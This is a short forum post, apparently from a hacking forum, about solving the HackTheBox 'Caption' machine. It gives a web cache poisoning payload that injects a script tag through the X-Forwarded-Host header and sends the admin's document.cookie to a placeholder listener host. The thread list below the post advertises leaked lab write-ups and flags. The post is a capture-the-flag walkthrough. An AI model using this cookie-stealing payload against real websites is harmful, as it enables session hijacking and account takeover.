Jan 12, 2025, 02:57 AM
|
HTB Caption - Linux - Hard
by mhsoraa - Saturday September 14, 2024 at 06:31 PM
|
|
Jan 24, 2025, 10:20 PM
(Jan 12, 2025, 02:57 AM)BlackBeer Wrote:(Nov 29, 2024, 05:34 PM)cutearmadillo Wrote: You use cache poisoning to insert malicious javascript into the page I'm not sure if i can atm, cause im at work and using a VM. but I sent the request when i first traversed to the /Firewalls page to repeater in burp and set up a listener: python3 -m http.server {listenerport} then sent ``` X-Forwarded-Host: 127.0.0.1"> </script> <script src="http://LOCALIP:LPORT/exploit.js"></script> <!-- ``` with the script containing ``` X-Forwarded-Host: 127.0.0.1"> </script> <script>new Image().src="http://LOCALIP:LPORT/?c="+encodeURI(document.cookie);</script><!-- ``` Then waited for my listener to catch the admin's cookie via the .js script that had been placed in the webcache Hope this helps, ping me later if it doesnt and i'll see if i can do any more |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] HackTheBox Dante - complete writeup written by Tamarisk | 602 | 91,841 |
10 hours ago Last Post: sabero_exe |
||
| [FREE] CPTS 12 FLAGS | 68 | 1,971 |
Yesterday, 09:54 AM Last Post: VictorPipeau |
||
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 371 | 93,017 |
Yesterday, 08:48 AM Last Post: phannguyenbaouy1 |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 21 | 2,629 |
Yesterday, 05:08 AM Last Post: popoler |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,276 |
Apr 30, 2026, 02:10 PM Last Post: kkkato |
||